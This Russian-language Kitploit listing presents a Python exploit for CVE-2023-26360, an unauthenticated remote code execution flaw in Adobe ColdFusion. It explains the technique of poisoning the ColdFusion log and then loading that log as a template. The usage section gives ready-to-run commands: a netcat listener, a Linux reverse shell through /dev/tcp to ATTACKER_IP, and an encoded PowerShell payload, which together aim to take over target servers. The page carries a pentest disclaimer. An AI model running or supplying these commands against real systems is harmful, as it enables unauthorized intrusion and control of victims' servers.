Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Adobe_ColdFusion_RCE_Unauthenticated — Этот эксплойт основан на CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) и создан на основе модуля Metasploit и jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit. | Kitploit
Инструменты/GitHubGitHub/joaoaugustom/adobe_coldfusion_rce_unauthenticated
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubjoaoaugustom/adobe_coldfusion_rce_unauthenticated

Adobe_ColdFusion_RCE_Unauthenticated

Этот эксплойт основан на CVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) и создан на основе модуля Metasploit и jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit.

Репозиторий
113 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-26360 — Неаутентифицированное удаленное выполнение кода Adobe ColdFusion

Реализация эксплойта для удаленного выполнения кода для CVE-2023-26360 на Python, основанная на анализе оригинального модуля Metasploit и предыдущей работы jakabakos.

Почему это существует

PoC от jakabakos пытается внедрить <cfexecute> непосредственно в параметр _variables и прочитать вывод из журнала ColdFusion за один шаг. Этот подход не работает, поскольку ColdFusion не вычисляет теги CFML в таком контексте, что приводит к ошибке 500 и отсутствию выполнения кода.

Эта реализация повторяет правильный двухэтапный механизм, используемый модулем Metasploit:

  1. Отравление журнала — отправляет вредоносную нагрузку _variables ({<cftry>CFML</cftry>) на уязвимую конечную точку CFC. ColdFusion не может обработать ее и записывает необработанный контент, включая код CFML, в .
coldfusion-out.log
  • Выполнение шаблона — использует уязвимость десериализации имени класса для загрузки отравленного файла журнала в качестве шаблона ColdFusion, что заставляет сервер выполнить внедренный CFML.
  • Выполнение команд осуществляется через java.lang.Runtime.exec() с помощью createObject, что позволяет избежать зависимости от <cfexecute>, который обычно отключен в усиленных или производственных средах.

    Уязвимые версии

    • Adobe ColdFusion 2021 Update 5 и более ранние
    • Adobe ColdFusion 2018 Update 15 и более ранние

    Requirements

    root@kitploit:~
    pip install -r requirements.txt
    

    Использование

    Запустите слушатель перед выполнением эксплойта:

    root@kitploit:~
    nc -lvnp 4444
    

    Цель Windows:

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"
    

    Цель Linux:

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
    

    Через прокси (например, Burp Suite):

    root@kitploit:~
    python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080
    

    Параметры

    FlagDescription
    --hostБазовый URL цели (например, http://192.168.1.10:8500)
    --cmdКоманда для выполнения на цели
    --winУстановите этот флаг, если цель — хост Windows
    --proxyОпциональный URL HTTP-прокси

    Как это работает

    root@kitploit:~
    ┌─────────────┐         Step 1: plant CFML          ┌──────────────────┐
    │   Attacker  │ ──── POST /_variables={<cftry>...  ──► iedit.cfc        │
    │             │      CF fails to parse, logs CFML     │                  │
    │             │                                       │ coldfusion-      │
    │             │         Step 2: trigger execution     │ out.log          │
    │             │ ──── POST classname=X..\logs\cf... ──► (loaded as       │
    │             │                                       │  CFML template)  │
    │  Listener   │ ◄─────────────── reverse shell ───────│                  │
    └─────────────┘                                       └──────────────────┘
    

    Ссылки

    • Рекомендации по безопасности Adobe
    • Анализ Rapid7 — AttackerKB
    • Модуль Metasploit
    • PoC от jakabakos

    Отказ от ответственности

    Этот инструмент предоставляется только в образовательных целях и для авторизованных оценок безопасности (пентесты, CTF, лабораторные среды). Запуск этого эксплойта против систем без явного письменного разрешения является незаконным. Автор не несет ответственности за любое неправомерное использование.

    Скачать инструмент